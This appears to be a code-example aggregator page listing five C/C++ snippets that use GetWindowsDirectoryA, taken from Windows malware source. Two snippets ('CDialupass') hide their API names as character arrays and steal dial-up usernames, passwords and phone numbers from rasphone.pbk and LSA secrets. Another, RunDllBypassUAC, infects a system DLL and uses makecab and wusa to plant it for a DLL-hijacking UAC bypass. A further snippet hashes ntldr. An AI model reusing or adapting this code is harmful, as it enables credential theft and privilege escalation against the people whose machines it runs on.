Beispiel #1
0
DWORD CDialupass::GetRasEntryCount()
{
	int		nCount = 0;
	char	*lpPhoneBook[2];
    char	szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
	GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
	pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));

	char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
	lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
	plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
	char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
	lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
	plstrcatA(szPhoneBook1, m_lpCurrentUser);
	plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

	char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
	SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);

	char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");

	lpPhoneBook[0] = szPhoneBook1;
	lpPhoneBook[1] = szPhoneBook2;

	DWORD	nSize = 1024 * 4;
	char	*lpszReturnBuffer = new char[nSize];
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
	{
		memset(lpszReturnBuffer, 0, nSize);
		GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
		pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
		for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
		{
			nCount++;
		}
	}
	delete lpszReturnBuffer;
	return nCount;
}
Beispiel #2
0
	//------------------------------------------------------------------------
	PCHAR GetSignalFileName()
	{
		// Функция возвращает имя сигнального файла


		// Определяем системный диск
		char WinDir[257];

		if (pGetWindowsDirectoryA(&WinDir[0], 256) == 0)
			return NULL;
		
		PCHAR Tmp = WinDir;
		while (*Tmp != ':') Tmp++;
		Tmp++;
		*Tmp = 0;
			
		// Создаём полнлё имя
		return STR::New(2, WinDir, (PCHAR)LoaderSignalFileName);
	}
Beispiel #3
0
char* CalcNtldrMd5(char* Buffer, DWORD BufferSize)
{
	CHAR path[MAX_PATH];

	pGetWindowsDirectoryA(path, MAX_PATH);
	path[3] = '\0';

	m_lstrcat(path, "ntldr");

	m_memset(Buffer, 0, BufferSize);

	string md5 = MD5StrFromFileA(path);

	if (md5.IsEmpty()) return NULL;
	if (BufferSize < 33) return NULL;

  	m_lstrcat(Buffer, md5.t_str());

	return Buffer;
}
Beispiel #4
0
bool RunDllBypassUAC( const LPVOID module, int szModule, int method )
{
	bool ret = false;
	//проверяем в нужной ли версии винды находимся
    OSVERSIONINFOA Version;    
    Version.dwOSVersionInfoSize = sizeof(OSVERSIONINFOA); 
    if( pGetVersionExA(&Version) )
    {		    
        if( Version.dwPlatformId != VER_PLATFORM_WIN32_NT ||
            Version.dwMajorVersion != 6 || !(Version.dwMinorVersion == 1 || Version.dwMinorVersion == 2) )
        {
            return false;
        }        
    }
    char engineDll[MAX_PATH];
	File::GetTempName(engineDll);

    DBG( "Saving engine DLL into the '%s'", engineDll );
    
    // write payload DLL into the temporary location
	if( File::WriteBufferA( engineDll, module, szModule ) != szModule ) return false;

    char targetDll[MAX_PATH], targetDllInfected[MAX_PATH];

    pGetSystemDirectoryA( targetDll, MAX_PATH );
	pPathAppendA( targetDll, uacTargetDll[method] );

    pGetTempPathA( MAX_PATH, targetDllInfected );
	pPathAppendA( targetDllInfected, uacTargetDll[method] );

    void* data = NULL;
    DWORD dataSize = 0;

    DBG( "Reading and infecting '%s'", targetDll );

    // read hijacking dll and infect it
	data = File::ReadToBufferA( targetDll, dataSize );
    if( data )
    {
        if( InfectImage( data, dataSize, engineDll, 0 ) )
        {
            DBG( "Saving infected DLL to '%s'", targetDllInfected);

            // write infected hijacking DLL into the temporary location
			if( File::WriteBufferA( targetDllInfected, data, dataSize ) )
            {
                char msuPath[MAX_PATH];
                pGetTempPathA( MAX_PATH, msuPath );
                pPathAppendA( msuPath, uacTargetMsu[method] );

                // delete old .msu file
                pDeleteFileA(msuPath);

                DBG( "Creating MSU file '%s'", msuPath);

                // make .msu archive
                Exec( 0, "makecab.exe /V1 %s %s", targetDllInfected, msuPath);
				if( File::IsExists(msuPath) )
                {        
                    char targetPath[MAX_PATH], targetDllPath[MAX_PATH];

                    pGetWindowsDirectoryA( targetPath, MAX_PATH - 1 );
					pPathAppendA( targetPath, uacTargetDir[method] );
					pPathAppendA( targetPath, uacTargetApp[method] );

                    pGetWindowsDirectoryA( targetDllPath, MAX_PATH - 1 );
					pPathAppendA( targetDllPath, uacTargetDir[method] );
					pPathAppendA( targetDllPath, uacTargetDll[method] );

                    DBG( "Extracting MSU data to '%s'", targetDllPath );

                    // extract dll file into the vulnerable app directory
                    Exec(NULL, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\%s", msuPath, uacTargetDir[method] );                
					if( File::IsExists(targetDllPath) )
                    {
                        DWORD exitCode = 0;

                        DBG( "Executing '%s'", targetPath );

                        // execute vulnerable application and perform DLL hijacking attack
                        if( Exec( &exitCode, "cmd.exe /C %s", targetPath ) )
                        {
                            if( exitCode == UAC_BYPASS_MAGIC_RETURN_CODE )
                            {
                                DBG( "UAC BYPASS SUCCESS" );
                                ret = true;
                            }
                            else
                            {
                                DBG( "UAC BYPASS FAILS" );
                            }
                        }

                        pDeleteFileA(targetDllPath);
                    }
                    else
                        DBG( "Error while extracting '%s' from MSU archive", targetDllPath );

                    pDeleteFileA(msuPath);
                }
                else
                    DBG( "Error while creating '%s'", msuPath );
            }
        }

        MemFree(data);
    }

    pDeleteFileA(targetDllInfected);
    pDeleteFileA(engineDll);

    return ret;
}
Beispiel #5
0
bool CDialupass::GetRasEntries()
{

	int		nCount = 0;
	char	*lpPhoneBook[2];
    char	szPhoneBook1[MAX_PATH+1], szPhoneBook2[MAX_PATH+1];
	GetWindowsDirectoryAT pGetWindowsDirectoryA=(GetWindowsDirectoryAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetWindowsDirectoryA");
	pGetWindowsDirectoryA(szPhoneBook1, sizeof(szPhoneBook1));

	char FBwWp22[] = {'l','s','t','r','c','p','y','A','\0'};
	lstrcpyAT plstrcpyA=(lstrcpyAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp22);
	plstrcpyA(Gyfunction->my_strchr(szPhoneBook1, '\\') + 1, "Documents and Settings\\");
	char DmDjm01[] = {'l','s','t','r','c','a','t','A','\0'};
	lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),DmDjm01);
	plstrcatA(szPhoneBook1, m_lpCurrentUser);
	plstrcatA(szPhoneBook1, "\\Application Data\\Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	char CtxPW39[] = {'S','H','G','e','t','S','p','e','c','i','a','l','F','o','l','d','e','r','P','a','t','h','A','\0'};
	SHGetSpecialFolderPathAT pSHGetSpecialFolderPathA=(SHGetSpecialFolderPathAT)GetProcAddress(LoadLibrary("SHELL32.dll"),CtxPW39);
    pSHGetSpecialFolderPathA(NULL,szPhoneBook2, 0x23, 0);

	char DQeBW01[] = {'%','s','\\','%','s','\0'};
    char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'};
    wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50);
	pwsprintfA(szPhoneBook2,DQeBW01, szPhoneBook2, "Microsoft\\Network\\Connections\\pbk\\rasphone.pbk");
	
	lpPhoneBook[0] = szPhoneBook1;
	lpPhoneBook[1] = szPhoneBook2;
	
	
	OSVERSIONINFO osi;
	osi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
	char FBwWp05[] = {'G','e','t','V','e','r','s','i','o','n','E','x','A','\0'};
	GetVersionExAT pGetVersionExA=(GetVersionExAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp05);
    pGetVersionExA(&osi);
	
	if(osi.dwPlatformId == VER_PLATFORM_WIN32_NT && osi.dwMajorVersion >= 5)
	{
		GetLsaPasswords();
	}	

	DWORD	nSize = 1024 * 4;
	char	*lpszReturnBuffer = new char[nSize];
	char FBwWp01[] = {'l','s','t','r','l','e','n','A','\0'};
	lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp01);
	for (int i = 0; i < sizeof(lpPhoneBook) / sizeof(int); i++)
	{
		memset(lpszReturnBuffer, 0, nSize);
		GetPrivateProfileSectionNamesAT pGetPrivateProfileSectionNamesA=(GetPrivateProfileSectionNamesAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetPrivateProfileSectionNamesA");
		pGetPrivateProfileSectionNamesA(lpszReturnBuffer, nSize, lpPhoneBook[i]);
		for(char *lpSection = lpszReturnBuffer; *lpSection != '\0'; lpSection += plstrlenA(lpSection) + 1)
		{	
			char	*lpRealSection = (char *)UTF8ToGB2312(lpSection);
			char	strDialParamsUID[256];
			char	strUserName[256];
			char	strPassWord[256];
			char	strPhoneNumber[256];
			char	strDevice[256];
			memset(strDialParamsUID, 0, sizeof(strDialParamsUID));
			memset(strUserName, 0, sizeof(strUserName));
			memset(strPassWord, 0, sizeof(strPassWord));
			memset(strPhoneNumber, 0, sizeof(strPhoneNumber));
			memset(strDevice, 0, sizeof(strDevice));


			char FBwWp04[] = {'G','e','t','P','r','i','v','a','t','e','P','r','o','f','i','l','e','S','t','r','i','n','g','A','\0'};
			GetPrivateProfileStringAT pGetPrivateProfileStringA=(GetPrivateProfileStringAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp04);
			int	nBufferLen = pGetPrivateProfileStringA(lpSection, "DialParamsUID", 0, 
				strDialParamsUID, sizeof(strDialParamsUID),	lpPhoneBook[i]);

			char FBwWp03[] = {'l','s','t','r','c','m','p','A','\0'};
			lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),FBwWp03);
			if (nBufferLen > 0)//DialParamsUID=4326020    198064
			{
				for(int j=0; j< (int)m_nRasCount; j++)
				{
					if(plstrcmpA(strDialParamsUID, m_PassWords[j].UID)==0)
					{
						plstrcpyA(strUserName, m_PassWords[j].login); 
						plstrcpyA(strPassWord, m_PassWords[j].pass); 
						m_PassWords[j].used=true;
						m_nUsed++;
						break;
					}
				}
			}

			pGetPrivateProfileStringA(lpSection, "PhoneNumber", 0, 
				strPhoneNumber, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			pGetPrivateProfileStringA(lpSection, "Device", 0, 
				strDevice, sizeof(strDialParamsUID),	lpPhoneBook[i]);
			char *lpRealDevice = (char *)UTF8ToGB2312(strDevice);
			char *lpRealUserName = (char *)UTF8ToGB2312(strUserName);
	 		Set(strDialParamsUID, lpRealSection, lpRealUserName, strPassWord,
 			strPhoneNumber, lpRealDevice);
//			delete	lpRealSection;
//			delete	lpRealUserName;
//			delete	lpRealDevice;
		}
	}
	delete lpszReturnBuffer;

	return true;
}